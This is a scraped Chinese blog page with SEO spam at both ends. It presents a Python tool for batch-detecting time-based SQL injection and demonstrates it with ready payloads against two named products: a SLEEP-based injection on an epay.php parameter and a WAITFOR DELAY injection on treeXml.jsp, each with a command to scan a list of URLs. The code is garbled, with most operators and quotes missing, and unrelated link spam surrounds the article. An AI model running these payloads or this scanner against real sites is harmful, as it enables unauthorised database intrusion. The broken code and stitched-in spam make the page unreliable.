当前位置: 首页 > news >正文

做外汇查哪个网站做数据新闻的网站

做外汇查哪个网站,做数据新闻的网站,拼多多网页qq登录,wordpress与discuz整合文章目录 前言批量检测sql延时注入工作原理脚本演示 前言 SQL延时注入是一种在Web应用程序中利用SQL注入漏洞的技术#xff0c;当传统的基于错误信息或数据回显的注入方法不可行时#xff0c;例如当Web应用进行了安全配置#xff0c;不显示任何错误信息或敏感数据时#x… 文章目录 前言批量检测sql延时注入工作原理脚本演示 前言 SQL延时注入是一种在Web应用程序中利用SQL注入漏洞的技术当传统的基于错误信息或数据回显的注入方法不可行时例如当Web应用进行了安全配置不显示任何错误信息或敏感数据时延时注入可以作为一种有效的攻击手段。 于是我想写个脚本来批量扫描岂不美滋滋 批量检测sql延时注入 #!/usr/bin/env python # -*- coding: utf-8 -*- import http.client import ssl import argparse import time from urllib.parse import urlparse from urllib.parse import urlencode# 定义控制台输出颜色代码 # 定义控制台输出颜色代码 RED \033[91m RESET \033[0mdef check_sql_delay_injection(url, path, payload, method):检查给定的URL是否存在SQL延迟注入漏洞。:param url: 目标URL:param path: 注入点:param payload: 测试负载:param method: 传参方式try:# 构造HTTP请求头headers {Content-Type: application/x-www-form-urlencoded,User-Agent: Mozilla/5.0}# 如果是GET请求将数据附加到URL后面if method.upper() GET:url1 url# 构造用于检测SQL注入漏洞的URL路径url pathurl ? payload # 注意这里使用?来追加参数# 解析URL获取协议、域名和路径parsed_url urlparse(url)# 根据URL协议创建HTTP或HTTPS连接if parsed_url.scheme https:# 忽略SSL证书验证conn http.client.HTTPSConnection(parsed_url.netloc, contextssl._create_unverified_context())else:conn http.client.HTTPConnection(parsed_url.netloc)# 记录请求开始时间start_time time.time()# 发送GET请求conn.request(GET, url, headersheaders)response conn.getresponse()# 记录请求结束时间elapsed_time time.time() - start_timeelse:url1 url# 解析URL获取协议、域名和路径parsed_url urlparse(url)body payload# 根据URL的协议选择HTTP或HTTPS连接conn http.client.HTTPSConnection(parsed_url.netloc, contextssl._create_unverified_context()) if parsed_url.scheme https else http.client.HTTPConnection(parsed_url.netloc)start_time time.time()# 发送POST请求conn.request(POST, path, bodybody, headersheaders)response conn.getresponse()# 记录请求结束时间elapsed_time time.time() - start_time# 如果响应时间在3到5秒之间可能存在延迟注入漏洞if 3 elapsed_time 6:print(f{RED}URL [{url1}{path}|0.0620] 可能存在SQL延时注入漏洞{RESET})else:print(fURL [{url1}{path}|0.0620] 不存在SQL延时注入漏洞)except Exception as e:print(fURL [{url1}{path}] 请求失败: {e})def main():程序主入口负责解析命令行参数并执行漏洞检查。# 创建命令行参数解析器parser argparse.ArgumentParser(description检测目标地址是否存在SQL延时注入漏洞)parser.add_argument(-u, --url, help指定目标地址)parser.add_argument(-f, --file, help指定包含目标地址的文本文件)parser.add_argument(-p, --path, default, help指定要请求的路径)parser.add_argument(-pl, --payload, default, help)parser.add_argument(-m, --method, defaultPOST, help请求方法GET或POST)# 解析命令行参数args parser.parse_args()# 如果指定了URL参数if args.url:# 确保URL以http或https开头if not args.url.startswith(http://) and not args.url.startswith(https://):args.url http:// args.url# 执行漏洞检查check_sql_delay_injection(args.url, args.path, args.payload, args.method)# 如果指定了文件参数elif args.file:# 打开文件并读取URL列表with open(args.file, r) as file:urls file.read().splitlines()# 遍历文件中的每个URL进行检查for url in urls:# 确保URL以http或https开头dataif not url.startswith(http://) and not url.startswith(https://):url http:// url# 执行漏洞检查check_sql_delay_injection(url, args.path, args.payload, args.method) # 程序入口 if __name__ __main__:main()工作原理 这个Python脚本是一个用于检测SQL延迟注入漏洞的工具。它通过发送HTTP请求到目标URL并根据响应时间来判断是否存在SQL延迟注入的可能性。以下是脚本的工作过程和原理的详细解释 导入模块脚本开始时导入了所需的模块包括http.client用于创建HTTP连接ssl用于处理HTTPS请求的SSL上下文argparse用于解析命令行参数time用于测量请求的响应时间以及urllib.parse中的urlparse和urlencode用于解析和编码URL。 定义颜色代码为了在控制台输出中使用颜色脚本定义了两个变量RED和RESET分别用于开始和结束红色文本的输出。 定义检测函数check_sql_delay_injection函数是脚本的核心它接收目标URL、注入点、测试负载和传参方式作为参数。函数内部首先构造HTTP请求头然后根据请求方法GET或POST来构造请求。 GET请求处理 如果请求方法是GET脚本会将注入点和测试负载附加到URL后面形成完整的请求URL。使用urlparse解析这个URL获取协议、域名和路径。根据URL的协议http或https创建相应的HTTP或HTTPS连接。发送GET请求并测量请求的响应时间。 POST请求处理 如果请求方法是POST脚本会将测试负载作为请求体并将注入点作为请求路径。与GET请求类似根据URL协议创建连接并发送POST请求。同样测量请求的响应时间。 判断延迟注入脚本通过比较响应时间是否在3到6秒之间来判断是否存在SQL延迟注入漏洞。如果是脚本会输出警告信息指出可能存在漏洞。 异常处理在尝试发送请求和接收响应的过程中如果发生任何异常脚本会捕获这些异常并输出错误信息。 命令行参数解析main函数负责解析命令行参数。用户可以通过-u/--url指定单个目标URL或者通过-f/--file指定包含多个URL的文件。用户还可以指定请求路径-p/--path、测试负载-pl/--payload和请求方法-m/--method。 执行检测根据用户提供的参数脚本会遍历每个URL并调用check_sql_delay_injection函数来执行检测。 程序入口脚本的标准入口是if __name__ __main__部分它调用main函数来启动程序。 这个脚本的原理基于SQL延迟注入漏洞的一个特点通过构造特殊的SQL语句使得数据库在执行时故意延迟从而推断出某些信息。通过测量HTTP请求的响应时间脚本尝试检测这种延迟。如果响应时间异常就可能表明存在SQL延迟注入漏洞。 脚本演示 测试用例129网课交单平台epay.phpSQL注入漏洞 测试命令 python .\sqltime.py -f .\url-post.txt -p /epay/epay.php -pl out_trade_no AND (SELECT 8078 FROM(SELECT(SLEEP(3)))eEcA) AND aEmCaEmC -m POST测试用例2飞企互联treeXml.jspSQL注入 测试命令 python .\sqltime.py -f .\url-get.txt -p /sys/treeXml.js%70 -pl menuName1;WAITFORDELAY0:0:5--typefunction -m GET当人们做不到一些事情的时候他们会对你说你也同样不能。
http://www.hkea.cn/news/14427777/

相关文章:

  • 做网站官网需多少钱西安专业做网站的公司有哪些
  • 创建个人主页网站长沙工程建设管理中心网站
  • 韩国在中国做美食的视频网站百家号排名
  • 商务网站的建设与管理如何建立免费个人网站
  • 画家网站建设手机源码网
  • 闵行网站建设多久能见效果东莞网站优化推荐
  • 网站图片悬浮代码wordpress模板带会员
  • 北京网站设计必看刻域名及网站建设实验报告
  • 电子商务网站系统开发物流平台运营
  • 房产网站开发seo排名诊断
  • 电子商务网站建设步骤一般为网页游戏中心大全
  • 吐鲁番网站建设飞浪网站建设
  • 建网站作业吉林响应式网站建设
  • 南通营销网站制作全国企业信用信息
  • 网站建设开发案例教程视频广州比较好的网站建设
  • 能在线做实验的网站一个人单干暴利项目
  • 成都网站建设推广详网站推广的方法枫子
  • 团员建设网站wordpress用户名不对
  • 长春网站建设小程网站如何做友情链接
  • 蜂蜜网站建设旅游网站策划营销
  • 江西省住房和城乡建设部网站企业宣传方式
  • 企业网站那几点重要外贸推广网站邮箱收费
  • 口碑好的做网站怀化市优化办电话
  • 网站建设犭金手指a排名15天津网站排名方案
  • 做网站可以申请国家补助吗用WordPress配置cms
  • 建筑图纸网站四川省中国建设银行招聘信息网站
  • 手机怎么做弹幕小视频网站晋中网站建设费用
  • 供求信息网站开发背景洛阳网站建设找洛阳铭信网络
  • 网站优化是做什么的php wordpress 开源
  • 哈市那里网站做的好营销型网站建设实训报告